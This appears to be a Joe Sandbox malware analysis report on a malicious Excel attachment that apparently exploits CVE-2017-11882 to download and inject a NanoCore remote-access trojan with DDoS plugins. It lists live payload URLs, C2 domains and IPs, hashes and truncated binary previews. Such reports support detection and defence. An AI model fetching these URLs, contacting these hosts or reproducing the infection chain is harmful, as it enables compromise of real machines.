Source: RegSvcs.exe, 00000009.00000002.691445743.0000000002781000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 6.2.vbc.exe.3981e88.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.e30000.11.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.3973018.18.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.3973018.18.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.e34629.12.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.e30000.11.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.3977641.19.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 6.2.vbc.exe.3981e88.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 6.2.vbc.exe.37369e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000009.00000002.690266961.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.691167896.0000000000E30000.00000004.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.692216842.0000000003971000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.488023420.0000000003A27000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.487642134.0000000003681000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2364, type: MEMORYSTR
Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2624, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_003F26E2 bind,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_003F2690 bind,

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation1Scheduled Task/Job1Extra Window Memory Injection1Disable or Modify Tools11Input Capture11System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer13Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsAccess Token Manipulation1Deobfuscate/Decode Files or Information1LSASS MemoryAccount Discovery1Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsCommand and Scripting Interpreter3Logon Script (Windows)Process Injection312Obfuscated Files or Information3Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsScheduled Task/Job1Logon Script (Mac)Scheduled Task/Job1Software Packing13NTDSSystem Information Discovery5Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsSecurity Software Discovery111SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading111Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol122Jamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion21DCSyncVirtualization/Sandbox Evasion21Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection312/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 483694 Sample: F99 SEP-15 Price Inquiry.xlsx Startdate: 15/09/2021 Architecture: WINDOWS Score: 100 38 newmeforever.3utilities.com 2->38 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Antivirus detection for URL or domain 2->58 60 17 other signatures 2->60 8 EQNEDT32.EXE 12 2->8         started        13 EXCEL.EXE 34 38 2->13         started        signatures3 process4 dnsIp5 44 207.246.99.155, 49167, 80 AS-CHOOPAUS United States 8->44 28 C:\Users\user\AppData\Local\...\nano[1].exe, PE32 8->28 dropped 30 C:\Users\Public\vbc.exe, PE32 8->30 dropped 64 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 8->64 15 vbc.exe 5 8->15         started        32 C:\Users\...\~$F99 SEP-15 Price Inquiry.xlsx, data 13->32 dropped file6 signatures7 process8 file9 34 C:\Users\user\AppData\Local\...\tmpC2C3.tmp, XML 15->34 dropped 36 C:\Users\user\AppData\...\smsBuojZSZn.exe, PE32 15->36 dropped 46 Uses schtasks.exe or at.exe to add and modify task schedules 15->46 48 Writes to foreign memory regions 15->48 50 Allocates memory in foreign processes 15->50 52 Injects a PE file into a foreign processes 15->52 19 RegSvcs.exe 7 15->19         started        24 schtasks.exe 15->24         started        signatures10 process11 dnsIp12 40 newmeforever.3utilities.com 79.134.225.19, 49168, 49169, 49170 FINK-TELECOM-SERVICESCH Switzerland 19->40 42 newmeforever12.3utilities.com 19->42 26 C:\Users\user\AppData\Roaming\...\run.dat, ISO-8859 19->26 dropped 62 Hides that the sample has been downloaded from the Internet (zone.identifier) 19->62 file13 signatures14

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
F99 SEP-15 Price Inquiry.xlsx29%ReversingLabsDocument-OLE.Exploit.CVE-2017-11882

Dropped Files

No Antivirus matches

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
9.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
9.2.RegSvcs.exe.e30000.11.unpack100%AviraTR/NanoCore.fadteDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://207.246.99.155/covid/nano.exe0%Avira URL Cloudsafe
http://www.%s.comPA0%URL Reputationsafe
newmeforever.3utilities.com100%Avira URL Cloudphishing
newmeforever12.3utilities.com100%Avira URL Cloudphishing

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
newmeforever.3utilities.com
79.134.225.19
truetrue
    unknown
    newmeforever12.3utilities.com
    unknown
    unknowntrue
      unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://207.246.99.155/covid/nano.exetrue
      • Avira URL Cloud: safe
      unknown
      newmeforever.3utilities.comtrue
      • Avira URL Cloud: phishing
      unknown
      newmeforever12.3utilities.comtrue
      • Avira URL Cloud: phishing
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://www.%s.comPAvbc.exe, 00000006.00000002.490720765.0000000006050000.00000002.00020000.sdmp, RegSvcs.exe, 00000009.00000002.692717936.0000000004DE0000.00000002.00020000.sdmpfalse
      • URL Reputation: safe
      low
      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000006.00000002.490720765.0000000006050000.00000002.00020000.sdmp, RegSvcs.exe, 00000009.00000002.692717936.0000000004DE0000.00000002.00020000.sdmpfalse
        high
        http://google.comRegSvcs.exe, 00000009.00000002.691445743.0000000002781000.00000004.00000001.sdmpfalse
          high
          http://www.day.com/dam/1.0CCB31E7E.emf.0.drfalse
            high

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            207.246.99.155
            unknownUnited States
            20473AS-CHOOPAUStrue
            79.134.225.19
            newmeforever.3utilities.comSwitzerland
            6775FINK-TELECOM-SERVICESCHtrue

            General Information

            Joe Sandbox Version:33.0.0 White Diamond
            Analysis ID:483694
            Start date:15.09.2021
            Start time:11:44:02
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 8m 27s
            Hypervisor based Inspection enabled:false
            Report type:light
            Sample file name:F99 SEP-15 Price Inquiry.xlsx
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of analysed new started processes analysed:9
            Number of new started drivers analysed:2
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.expl.evad.winXLSX@8/25@31/2
            EGA Information:Failed
            HDC Information:
            • Successful, ratio: 0.1% (good quality ratio 0%)
            • Quality average: 0%
            • Quality standard deviation: 0%
            HCA Information:
            • Successful, ratio: 98%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .xlsx
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Scroll down
            • Close Viewer
            Warnings:
            Show All
            • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, conhost.exe
            • TCP Packets have been reduced to 100
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtCreateFile calls found.
            • Report size getting too big, too many NtDeviceIoControlFile calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryAttributesFile calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            11:44:46API Interceptor66x Sleep call for process: EQNEDT32.EXE modified
            11:44:50API Interceptor21x Sleep call for process: vbc.exe modified
            11:44:53API Interceptor1x Sleep call for process: schtasks.exe modified
            11:44:56API Interceptor1587x Sleep call for process: RegSvcs.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            207.246.99.155HBW PAYMENT LIST FOR 2021,20210809.xlsxGet hashmaliciousBrowse
            • 207.246.99.155/covid/nano.exe
            79.134.225.19ZjITlPeOc4.exeGet hashmaliciousBrowse
              Quotation Request.xlsxGet hashmaliciousBrowse
                Swift-Correction.exeGet hashmaliciousBrowse
                  Swift_Confirmation.exeGet hashmaliciousBrowse
                    ORDER3898.exeGet hashmaliciousBrowse
                      Order No-202000125.xlsmGet hashmaliciousBrowse
                        USD35900.exeGet hashmaliciousBrowse

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          newmeforever.3utilities.comKfvFDMfREk.exeGet hashmaliciousBrowse
                          • 107.174.224.202
                          Document-#11420.xlsxGet hashmaliciousBrowse
                          • 107.174.224.202
                          GePZmBqCQ4.exeGet hashmaliciousBrowse
                          • 79.134.225.25
                          COMMERCIAL INVOICE AND PACKING LIST 1838CTNS,Date - 19th August2021.xlsxGet hashmaliciousBrowse
                          • 79.134.225.25
                          eIR8HT660q.exeGet hashmaliciousBrowse
                          • 79.134.225.25
                          EGxDSO4qfi.exeGet hashmaliciousBrowse
                          • 79.134.225.25
                          c3GwsoGAOg.exeGet hashmaliciousBrowse
                          • 79.134.225.25
                          HBW PAYMENT LIST FOR 2021,20210809.xlsxGet hashmaliciousBrowse
                          • 79.134.225.25

                          ASN

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          FINK-TELECOM-SERVICESCHPO-INV 21460041492040401.PDF.exeGet hashmaliciousBrowse
                          • 79.134.225.7
                          Quotation_562626263667.pdf.jsGet hashmaliciousBrowse
                          • 79.134.225.10
                          IRCeN4WRoN.exeGet hashmaliciousBrowse
                          • 79.134.225.87
                          Covid-19 Data Report Checklist_pdf.exeGet hashmaliciousBrowse
                          • 79.134.225.107
                          HhnZ6B5xzZ.exeGet hashmaliciousBrowse
                          • 79.134.225.91
                          Oferta de produto 74675673748.jarGet hashmaliciousBrowse
                          • 79.134.225.10
                          Purchase Order.jsGet hashmaliciousBrowse
                          • 79.134.225.10
                          Purchase Order.jsGet hashmaliciousBrowse
                          • 79.134.225.10
                          Payments_Copy.jarGet hashmaliciousBrowse
                          • 79.134.225.10
                          Payments_Copy.jarGet hashmaliciousBrowse
                          • 79.134.225.10
                          SKM_C454e20121811360.pdf.exeGet hashmaliciousBrowse
                          • 79.134.225.39
                          kWGdFglyCp.exeGet hashmaliciousBrowse
                          • 79.134.225.77
                          Covid-19 Data Report .exeGet hashmaliciousBrowse
                          • 79.134.225.107
                          Covid-19 Data Report Google Checklist.exeGet hashmaliciousBrowse
                          • 79.134.225.107
                          Price Request #20210907.exeGet hashmaliciousBrowse
                          • 79.134.225.95
                          Quote_request.exeGet hashmaliciousBrowse
                          • 79.134.225.95
                          tNC1w6dXQ9.exeGet hashmaliciousBrowse
                          • 79.134.225.76
                          7PAX _Trip Itinerary Details.pdf.vbsGet hashmaliciousBrowse
                          • 79.134.225.27
                          RRGpqq27Rl.exeGet hashmaliciousBrowse
                          • 79.134.225.21
                          0sTLyRfo4M.exeGet hashmaliciousBrowse
                          • 79.134.225.53
                          AS-CHOOPAUSre2.armGet hashmaliciousBrowse
                          • 207.148.95.64
                          XbvAoRKnFm.exeGet hashmaliciousBrowse
                          • 144.202.76.47
                          setup_x86_x64_install.exeGet hashmaliciousBrowse
                          • 144.202.76.47
                          HBW PAYMENT LIST FOR 2021,20210809.xlsxGet hashmaliciousBrowse
                          • 207.246.99.155
                          setup_x86_x64_install.exeGet hashmaliciousBrowse
                          • 144.202.76.47
                          RIkJg4Hr71Get hashmaliciousBrowse
                          • 44.175.18.143
                          sora.x86Get hashmaliciousBrowse
                          • 44.168.96.238
                          sora.arm7Get hashmaliciousBrowse
                          • 66.42.126.39
                          OVLzirpJInGet hashmaliciousBrowse
                          • 66.42.66.49
                          Signature_Page.-639143_20210913.xlsbGet hashmaliciousBrowse
                          • 207.246.119.1
                          RZAcKBlQo0.exeGet hashmaliciousBrowse
                          • 104.238.167.111
                          dllhost.exeGet hashmaliciousBrowse
                          • 45.76.173.101
                          ac1khvFT2V.exeGet hashmaliciousBrowse
                          • 45.32.240.31
                          8U5snojV8p.exeGet hashmaliciousBrowse
                          • 95.179.229.244
                          Antisocial.x86Get hashmaliciousBrowse
                          • 45.63.53.213
                          setup_x86_x64_install.exeGet hashmaliciousBrowse
                          • 144.202.76.47
                          setup_x86_x64_install.exeGet hashmaliciousBrowse
                          • 144.202.76.47
                          setup_x86_x64_install.exeGet hashmaliciousBrowse
                          • 144.202.76.47
                          p4vXpD0P73Get hashmaliciousBrowse
                          • 155.138.185.219
                          j3LQELTT0mGet hashmaliciousBrowse
                          • 167.179.103.218

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nano[1].exe
                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:downloaded
                          Size (bytes):1044992
                          Entropy (8bit):7.850518378611463
                          Encrypted:false
                          SSDEEP:24576:F8oIlI5wVNEDoAzqMj+6zpTNyBCWIy5/fYd1xu1ZlIu:a2cNwzqMi6lTM0yI21Z1
                          MD5:AD2C14959341C7EC7D72C9FB3B10DEB9
                          SHA1:737ED1193D72E4C7CD48FBDFEDF9AB667ABE68CD
                          SHA-256:1EE33DB9BD5B99DA583572D6916630D858ED387EAB79C352F61EC070D2A600FA
                          SHA-512:35D0ABD365DA9A05A8B1B273FB936EFED92AFA03B7463F1E16901D053192B0EEE9F9BE71EB51516AF24A64F9F4E27EE20FFB55F30615EC8456CAEB8C682D7E20
                          Malicious:true
                          Reputation:low
                          IE Cache URL:http://207.246.99.155/covid/nano.exe
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Aa.....................n........... ........@.. .......................`............@.................................0...W.......<k........................................................................... ............... ..H............text........ ...................... ..`.reloc..............................@..B.rsrc...<k.......l..................@..@................l.......H........I...V......H...................................................z.(......}.....(....o....}....*..*...0...........{......E............8...Z...u................*..}..... ].4S}......}.....*..}..... ..Q.}......}.....*..}......{.... Km.a}......}.....*..}..... ,...}......}.....*..}......{.... ..=.a}......}.....*..}..... ....}......}.....*..}..... "G.R}......}.....*..}.....*...{....*.s....z.2.{.....+...*....0..<........{......3..{....(....o....3...}......+..s.......{....}..
                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3020C4AA.png
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                          Category:dropped
                          Size (bytes):49744
                          Entropy (8bit):7.99056926749243
                          Encrypted:true
                          SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                          MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                          SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                          SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                          SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34B8769F.jpeg
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                          Category:dropped
                          Size (bytes):85020
                          Entropy (8bit):7.2472785111025875
                          Encrypted:false
                          SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                          MD5:738BDB90A9D8929A5FB2D06775F3336F
                          SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                          SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                          SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4B9F44A0.png
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                          Category:dropped
                          Size (bytes):33795
                          Entropy (8bit):7.909466841535462
                          Encrypted:false
                          SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                          MD5:613C306C3CC7C3367595D71BEECD5DE4
                          SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                          SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                          SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                          Malicious:false
                          Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5448D905.jpeg
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                          Category:dropped
                          Size (bytes):14198
                          Entropy (8bit):7.916688725116637
                          Encrypted:false
                          SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                          MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                          SHA1:72CA86D260330FC32246D28349C07933E427065D
                          SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                          SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                          Malicious:false
                          Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7EDDCF3C.jpeg
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
